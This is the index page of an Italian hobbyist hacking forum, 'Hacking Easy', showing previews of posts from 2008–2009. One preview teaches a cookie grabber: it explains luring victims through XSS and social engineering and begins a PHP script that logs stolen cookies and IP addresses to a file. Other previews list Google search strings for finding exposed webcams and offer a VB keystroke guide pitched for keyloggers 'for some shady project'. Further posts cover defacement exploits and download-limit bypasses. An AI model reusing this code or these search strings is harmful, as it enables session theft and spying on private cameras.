ATTENZIONE: Hackingeasy si è trasferito ad un nuovo indirizzo: HACKINGEASY.TK

Hacking Easy - [ Hacking - Programmazione - Trucchi - Msn - Off topic -  Grafica ]

Bacheca Hacking Easy
Benvenuto su Hacking Easy, questo forum è gestito da persone di tutta Italia che hanno in comune una passione, quella del computer, della sua sicurezza.
Nessuno qui si crede o pensa di essere un Hacker, questo forum cerca di essere un punto di incontro e discussione per chi condivide con noi questa passione.
Importante prima di entrare a far parte del nostro mondo è quello di presentarsi nella sezione welcome , dopodiche sei libero di fare domande o di diffondere ciò che sai, a patto che non infranga il nostro regolamento.
Molte delle tecniche qui descritte se vengono messe in atto possono portare a compiere azioni illegali percui lo staff invita a leggere il disclaimer.

Speriamo in una tua lunga permanenza sul forum.

lo staff di hackingeasy
Staff

E-Zine-UnderAttHack

Partecipa al progetto: QUI


Annunci

Aiuta Hacking Easy! Scrivi Up:
QUI e QUI

Votaci QUI


Contest in Atto QUI


Se ti serve una tabella
fai richiesta ---> QUI <---

Musica



Grazie 4ndr3!!27 per la bacheca.




Hackingeasy si è trasferito ad un nuovo indirizzo:

http://hackingeasy.tk

[X]
Venite a trovarci numerosi!

30-01-09
Esce ufficialmente il numero 0 del progetto Underatthack

Grazie all'ottimo lavoro di tutta la redazione

Clicca ---> QUI <--- per i codici dei banner di HE
 


adsmanet

Image and video hosting by TinyPic

Group: Founder
Posts: 5786
Location: Network in progress...


Status: Offline: ultima azione eseguita il 27/6/2009, 20:40

P_MSG  P_EMAIL  P_WEBSITE  P_MSN 

Friends
  • C.N.69
  • milena84
  • _MRK259_
  • PirataPas
  • whacker
  • ZeroKool
  • _ShAdY_

M_ADDMEM


2 user(s) online
F_ACTIVE
1 guests
1 members
0 Anonymous Members
[ View Complete List ]

>mauri91weed

User legend: [Founder] [Co-founder] [Admin] [Moderatore] [Global Mod.] [Grafico] [Programmatore] [Banned] [webdesigner] [Member] [User to validate]


Statistics
F_STATS
Hacking Easy - [ Hacking - Programmazione - Trucchi - Msn - Off topic - Grafica ] have:
27 articles, 200 comments, 347 members,
62.342 total visits, 453 visits this month,
18º in Top Blog

Most users ever online was 51 on 12/12/2008, 16:20

1 member is celebrating his/her birthday today: Midnight Melody (20)


Calendar



B_NORM  
Partecipare all'Ezine UnderAttHack, L'E-zine di Hacking-Easy
view post Posted on 23/6/2009, 18:36 by: vikkio88P_QUOTE

image


UnderAttHack, e-zine di informatica e sicurezza, cerca persone capaci e interessate a proporre qualcosa di innovativo e interessante sugli argomenti informatica e programmazione.
Come potete vedere dai numeri precedenti, gli argomenti trattati sono i più vari, dalla sicurezza alla programmazione, al social-engineering, all'etica vera e propria.
Uno spazio non ancora presente ma in lavorazione è ad esempio una sezione dedicata all'hacker-art (digital-art, cyber-punk ecc.)
Chi fosse interessato a inviare un articolo può farlo tramite l'indirizzo email: underatthack[at]gmail.com
Allo stesso indirizzo ci si può rivolgere per maggiori informazioni su altre forme di collaborazione.
...ma a questo punto fate prima a rivolgervi direttamente a me via MP o via MSN o via mail... xD
Ovviamente la redazione si riserva di non pubblicare articoli inutili/lamerosi/bimbominkiosi.


Per ulteriori informazioni ==> image image
Top
Comments: 0 | Views: 4
Last Post by: vikkio88 (23/6/2009, 18:36)
 

B_NORM    
view post Posted on 25/2/2009, 23:08 by: k3rn3lP_QUOTE
Intanto cos'è un cookie:

Altro non è che un file di testo contenente determinati dati e viene inviato dal server web in contemporanea alla pagina internet e successivamente salvato in una cartella del vostro browser.
Servono per far si che il borwser possa identificarli in modo da associarli al server che li ha generati. Di conseguenza possiamo dire che ogni server prosuce il suo cookie per permetterne poi il riconoscimento quando ci si ricollega.

Inoltre un cookie memorizza cnhe tutti i dati inseriti nei form, come username e password per accedere ad aree riservate di siti. avviene più precisamente che dopo aver inserito i dati di accesso ad esempio e dato l'ok, il server ci genera il cookie contenente tali dati in modo da esser riconosciuti dal server anche al prossimo accesso...si intuisce che qualora settassimo il nostro browser in modo da rifiutare i cookie, non ci si potrebbe autenticare su nessun sito.

Qundi vien generato un cookie ogni volta che visitate qualunque sito e vengon salvate tutte le impostazioni e operazioni che fate.
Capite allora la grossa importanza di un cookie e il "potere" che esso ha!
E a questo punto sorge la domanda: e se qualcuno si impossessasse dei miei cookie? meglio ancora dei cookie con dati di accesso...?
E qui ecco che subentra appunto il cookie grabber!!!


Cookie grabber:
Catturando dei cookie con un cookie grabber, si può risalire quindi a tante informazioni personali delle vittime alle quali li abbiamo sottratti.
Bastano poche righe di codice in php per creare un cookie grabber e implementarlo e utilizzarlo in diversi modi...un esempio e con una XSS.

Scriviamo queste poche righe di codice su un qualsiasi editor di testo, salviamo il file nel formato .php e lo uppiamo sul nostro spazio web. A questo punto basta indirizzare in qualche modo la vittima alla pagina web alla quale è collegato il cookie grabber (con un po' di social engineering) e saranno catturati i suoi cookie con tutti i dati...anche username e password...che saranno salvati su un file .txt che si trova sempre nel nostro spazio web (nell'esempio saranno salvati nel file "file.txt").
Le password non saranno esplicite però, ma in "hash md5" (cioè criptate con questa chiave)...ma basta un semplice programma o uno dei tanti siti web che offrono la conversione da questa forma criptata in forma chiara e leggibile, ed è fatta.

Esempio di un cookie grabber:
CODICE
[/CODE]
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('file.txt', 'a');
fwrite($fp, '...

Read the entire post...

Top
Comments: 3 | Views: 57
Last Post by: vikkio88 (28/2/2009, 14:50)
 

B_NORM    
Super megaupload, Come superare i controlli
view post Posted on 25/2/2009, 18:43 by: grisu_94P_QUOTE
Spesso quando si vuole scaricare da un sito un file si viene rimandati a megaupload
Il servizio è molto utile ma per chi non ha il premium diventa un casino

Parte I (informazioni generali)



A)Differenza tra normali,user,premium
Qua sotto farò una piccola tabella con le principali differenze
<carattteristica>--------------------<normale>-------<user>-------<premium>
Max download contemporanei: ---------1-----------------1--------------infiniti
Tempo di attesa: ----------------------45 sec----------25 sec------------0 sec
Pubblicità: -----------------------------minimo----------medio----------massimo
Priorità:-------------------------------- zero---------------minimo------massimo

C)Come rimediare
Un modo per superare alcuni di questi problemi esiste:
è una combinazione tra firefox e greasemonkey

C)cos'è grasemonkey
è un estensione di firefox che permette di eseguire degli script creati dall'utente o terzi con lo scopo di modificare durante il download delle pagine web le pagine stesse
1)utilizzi
viene usato per migliorare le pagine web togliendo la pubblicità, creando tabelle di comparazione (sopratttutto nei motori di ricerca e nei brower games) o collegamenti veloci oltre che a cambiare l'aspetto grafico

Parte II (all'attaco!)



1)Procurarsi il materiale
Dobbiamo inanzitutto avere i requisiti fondamentali
-firefox Pagina ufficiale
-greasemonkey download da firefox add-ons
-Estensione megaupload helper Pagina in userscript

2)iniziamo! (è facilissimo)
-Installiamo firefox
-dopo l'installazione si avvierà in automatico quindi cliccate all'indirizzo per greasemonkey e cliccate su download
-aspettate i 3 secondi e cliccate su installa
-riavviate firefox
ora in basso a destra sulla barra di stato dovrbbe esserci l'icona di una scimmietta
-installate lo script sopra indicato (megaupload helper)
Per installarolo dovrebbe apparire una scermata simile a quella di prima ma con l'icona della scimmietta anche qui cliccate su installa

Fatto!!!


Ora cliccando su un link a megaupload potrete scaricare anche 30 download insieme senza aspettare un secondo
Lo svantaggio è che la parte grafica della pagina verrà cancellata, ma infondo non è che sia cosi utile
!!!!!Attenzione!!&...

Read the entire post...

Top
Comments: 5 | Views: 200
Last Post by: grisu_94 (27/2/2009, 16:43)
 

B_NORM    
view post Posted on 13/10/2008, 17:10 by: ZeroKoolP_QUOTE
Cosa sono i cookie

Il cookie sono file di testo che contengono informazioni sull’utente che visita un sito, essi possono essere impostati per sessione rimanendo nella memoria di sistema fino alla chiusura del browser oppure, possono avere una determinata scadenza o essere permanenti ed allora vengono memorizzati in una apposita cartella del disco fisso locale sotto forma di file di testo in modo da Poter essere successivamente recuperati dal sito.

Come funzionano

I cookie sono spesso usati dagli sviluppatori web, perchè danno la possibilità di gestire informazioni senza bisogno di memorizzarle sul server stesso, ma in maniera distribuita sui client, preservando quindi le risorse del server. I siti Internet che li utilizzano, ne fanno uso, solitamente, oltre che per controllare quante volte uno stesso utente accede al sito web, anche per memorizzare informazioni che possano rendere migliore la navigazione di una persona all'interno di uno stesso sito, ad esempio possono essere creati per conservare informazioni di login per accesso ad un forum o ad un’area privata.

I Parametri:
I cookie sono caratterizzati dagli attributi:

CODICE
* Nome/Valore:

possiamo pensare ad esso come ad una variabile, obbligatorio.

* Scadenza (expiration date):

è opzionale ed indica la scadenza del cookie rispetto al timestamp nel  quale lo stesso viene creato, può essere espressa come data, come numero di giorni, come NOW   (adesso) e come NEVER (mai). L'utilizzo di una scadenza  NOW elimina il cookie dal sistema     ospite in quanto il cookie scade nel momento in cui viene creato o aggiornato. L'utilizzo di una  scadenza NEVER permette la creazione di cookies non soggetti a scadenza.

* Sicuro (secure):

è un attributo opzionale che indica se il cookie debba essere trasmesso criptato HTTPS.

* Percorso (path):

è opzionale e definisce il sottoinsieme di indirizzi url a cui il cookie può essere applicato.

* Dominio (domain):

indica il dominio a cui il cookie si riferisce.



Vulnerabilità dei Cookie


La vulnerabilità dei cookie è dovuta proprio alla loro semplicità, infatti i cookie non sono altro comuni file di testo quindi modificare il loro contenuto non dovrebbe essere un operazione molto difficile. La tecnica che ba...

Read the entire post...

Top
Comments: 4 | Views: 206
Last Post by: kokakola92 (13/10/2008, 19:29)
 

B_NORM    
view post Posted on 29/9/2008, 21:44 by: rELypSEP_QUOTE
visto che dell argomento defacing me ne intendo molto poco volevo farvi alcune domande...
la prima è questa: ho notato in giro che gli exploits possono essere in freebsd, linux,windows ecc. ma quello che mi domando è ma cosa centrano i sistemi operativi con i siti da defacciare??
e poi un altra domanda... ho fatto un giro su milw0rm e nn riesco a capire come guardando un exploits riesco a trarne dei risultati capendo di quale piattaforma dei siti e di quale vulnerabilità si occupa...
potete aiutarmi??
Top
Comments: 5 | Views: 97
Last Post by: adsmanet (12/10/2008, 14:34)
 

B_NORM    
Due siti importanti, Free log-in & 10 minuti mail ( PAG 1 2 )
view post Posted on 28/9/2008, 11:17 by: ¤Uriel¤P_QUOTE
Ciao raga,
Questi due siti sono davvero utili!
Il primo:

"Bugmenot":
http://www.bugmenot.com/

Fornisce i dati di log-in di qualsiasi sito, potete anche voi aggiungere un account. ( Mi raccomando NON cambiate le password agli account!!! )


Quest'altro sito invece:

10 Minute Mail:
http://10minutemail.com/10MinuteMail/index.html

Fornisce un indirizzo di posta, valido per soli 10 minuti. Davvero utile se dovete fare una registrazione veloce, e non volete fornire la vostra vera mail!

Bhè divertitevi! :P
Top
Comments: 15 | Views: 313
Last Post by: mattos (19/10/2008, 19:48)
 

B_NORM    
view post Posted on 27/8/2008, 17:38 by: kratos_18P_QUOTE
con delle semplice stringhe possiamo vedere alcune videocamere
basta metterle nel motore di ricerca
ecco le stringhe
CODICE
inurl:”ViewerFrame?Mode=”
-
inurl:view/indexFrame.shtml
-
inurl:”axis-cgi/mjpg”
-
inurl:”MultiCameraFrame?Mode=”
Top
Comments: 3 | Views: 166
Last Post by: kratos_18 (28/8/2008, 09:30)
 

B_NORM    
WinRar Joiner, Unire due o più File
view post Posted on 24/8/2008, 14:17 by: ¤Uriel¤P_QUOTE
Vi è mai capitato di dover unire due o più eseguibili? Magari avete usato strani programmi joiner...
Meglio usare WinRar!!!
Siccome mi scoccio di scrivere, vi posto una bella immagine!


Credo sia abbastanza chiara no? Se avete dubbi postate!
Top
Comments: 6 | Views: 139
Last Post by: MRK259 (7/9/2008, 11:57)
 

B_NORM    
view post Posted on 10/8/2008, 19:03 by: adsmanetP_QUOTE

IL VB E LA TASTIERA



#############################-Disclaimer Legale-#############################
Tutto il materiale qui presente è stato scritto a puro scopo didattico, l'autore non si assume nessuna responsabilità per le informazioni qui riportate. Questo materiale può essere divulgato, modificato e chi vuole può pure metterci il prorpio nome, la gloria non fa per me!
######################

COSA è RICHIESTO:

-una conoscenza di base del VB
-il compilatore per VB
-la capacità di dichiarare un'API
-un po' di fantasia

Se almeno una volta nella vostra vita vi è venuta la voglia di scrivervi un keylogger o di simualre la pressione di un tasto per chissà quale scopo allora questa guida fa per voi!

PARAGRAFI:

1-SIMULARELA PRESSIONE DEI TASTI
2-CONTROLLARE I TASTI

--------------------> SIMULARE LA PRESSIONE DEI TASTI <----------------------

Se per qualche losco progetto avete la necessità di far pemere un tasto su un pc senza avervi l'accesso fisico, e se magari sul quel pc gira Windows beh, prendete il vostro compilatore e dateci dentro perchè col Vb questa operazione è estremamente semplice. Le uniche cose da utilizzare saranno un API e qualche costante. Ma andiamo con ordine.
Dichiariamo la nostra funzione:

Declare Sub keybd_event Lib "user32" (ByVal bVk As Byte, ByVal bScan As Byte, ByVal dwFlags As Long, ByVal dwExtraInfo As Long)

e due costanti:

Const KEYEVENTF_EXTENDEDKEY = &H1
Const KEYEVENTF_KEYUP = &H2

Queste due costabti indicano rispetivamente la pressione del tasto (KeyDown) e il suo rilascio (KeyUp) infatti per realizzare la pressione di un tasto bisogna effetivamente farla nel codice: prima si preme e poi si rilascia il tasto, solo allora la pressione sarà caompleta. Nell'API dichiarata sopra bVk indica il tasto da premere, bScan il codice per la scansione del testo (settatelo a 0), dFlags se il tasto sarà premuto o rilasciato mentre dwExtraInfo non viene utilizzato dal VB (mettete a 0 pure questo). Detto questo sareste quasi pronti per simulare la pressione di un tasto, vi amnca solo il valore da passare a bVk. Questa variabile che conterrà il bottone da premere richiede una costante di VB relativa alla tastiera. Di seguito riporto alcune delle costanti più usate:

Costante Tasto Valore

vbKeyCancel Tasto ANNULLA 3
vbKeyBack Tasto BACKSPACE 8
vbKeyTab Tasto TAB 9
vbKeyReturn Tasto INVIO 13
vbKeyShift Tasto MAIUSC 16
vbKeyControl Tasto CTRL 17
vbKeyMenu Tasto MENU 18
vbKeyCapital Tasto BLOC MAIUSC 20
vbKeyEscape Tasto ESC 27
vbKeySpace BARRA SPAZIATRICE 32

mentre per le lettere dell'alfabeto si usano semplicemnte vbKeyA o vbKeyB e così via mentre il loro valore equivale al codice ASCII della laettera. Stesso ragionamento vale per i tsti funzione, vbKeyF1 equivarrà a F1 e vbKeyF6 equivarrà a F6. I valori dei ta...

Read the entire post...

Top
Comments: 0 | Views: 1235
Last Post by: adsmanet (10/8/2008, 19:03)
 

B_NORM    
Animoticon & Password, Leggenda o realtà?
view post Posted on 4/8/2008, 15:30 by: ¤Uriel¤P_QUOTE
Tempo fa, King-Lion ha annunciato che riusciva a prelevare la chiave di registro ( tra l'altro sbagliata ) delle password di msn.
Ho provato a seguire quello che ha scritto, e davvero ho trovato ciò che King diceva.
I problemi sono questi:
1) Non sconosco il Falsh
2) Non credo che tramite Falsh si possa prelevare la chiave di registro ( Visto che non si possono far partire file eseguibili...)
3) Mi sa che si deve cambiare qualcosa anche nei file .xml...

Avete qualche info?
Io avevo pensato a qualcosa tipo far aprire una pag web o altro bho...
Top
Comments: 13 | Views: 511
Last Post by: ¤Uriel¤ (27/8/2008, 17:27)
 

Search:

 




Piccola Chicca di Hackingeasy_adsmanet
Hackingeasy
Gemellaggi_di_Hackingeasy
[X] Image and video hosting by TinyPic Photobucket G.S.P





Affiliati di Hackingeasy
Per richieste Affiliazioni qui
Link Utili
Forum
Progetto UnderAttHack
Dove presentarsi
Per Affiliarsi Hackingeasy
Regolamento
Proponiti nello Staff
Progetto UnderAttHack in attuazione

 


La skin di questo forum è stata modificata da Fede8, e solo x Hacking_Easy